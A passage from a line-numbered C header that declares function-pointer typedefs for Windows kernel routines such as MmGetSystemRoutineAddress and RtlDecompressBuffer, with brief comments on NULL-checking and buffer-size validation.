398 | ULONG_PTR BugCheckParameter1, \
399 | ULONG_PTR BugCheckParameter2, \
400 | ULONG_PTR BugCheckParameter3, \
401 | ULONG_PTR BugCheckParameter4);
402 | typedef VOID (__fastcall *EXSYSTEMTIMETOLOCALTIME)(PLARGE_INTEGER SystemTime, \
403 | PLARGE_INTEGER LocalTime);
/* Resolver and helper types: MmGetSystemRoutineAddress takes a UNICODE_STRING
 * routine name (typically built with RtlInitUnicodeString) and returns NULL
 * when the export is absent, so every lookup result must be NULL-checked
 * before being cast to one of the pointer types above. */
404 | typedef PVOID (__fastcall *MMGETSYSTEMROUTINEADDRESS)(PUNICODE_STRING SystemRoutineName);
405 | typedef VOID (__fastcall *RTLINITUNICODESTRING)(PUNICODE_STRING DestinationString,PCWSTR SourceString);
/* RtlDecompressBuffer writes at most UncompressedBufferSize bytes and reports
 * the actual size through FinalUncompressedSize; the destination size must be
 * validated by the caller, not inferred from the compressed input. */
406 | typedef NTSTATUS (__fastcall *RTLDECOMPRESSBUFFER)(USHORT CompressionFormat, \
407 | PUCHAR UncompressedBuffer, \
408 | ULONG UncompressedBufferSize, \
409 | PUCHAR CompressedBuffer, \
410 | ULONG CompressedBufferSize, \
411 | PULONG FinalUncompressedSize);
412 | #endif
413 |
414 |
415 | #endif